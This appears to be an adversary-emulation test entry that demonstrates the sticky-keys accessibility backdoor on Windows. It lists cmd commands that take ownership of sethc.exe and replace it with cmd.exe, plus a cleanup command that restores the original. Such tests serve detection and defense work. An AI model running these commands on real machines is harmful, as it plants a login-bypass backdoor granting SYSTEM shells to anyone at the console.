#TechniqueName: Event Triggered Execution: Accessibility Features
#AtomicTestName: Replace binary of sticky keys
#Description: Replace sticky keys binary (sethc.exe) with cmd.exe&
#Language: cmd

#commands
copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
takeown /F C:\Windows\System32\sethc.exe /A
icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe


#cleanup_commands
copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe

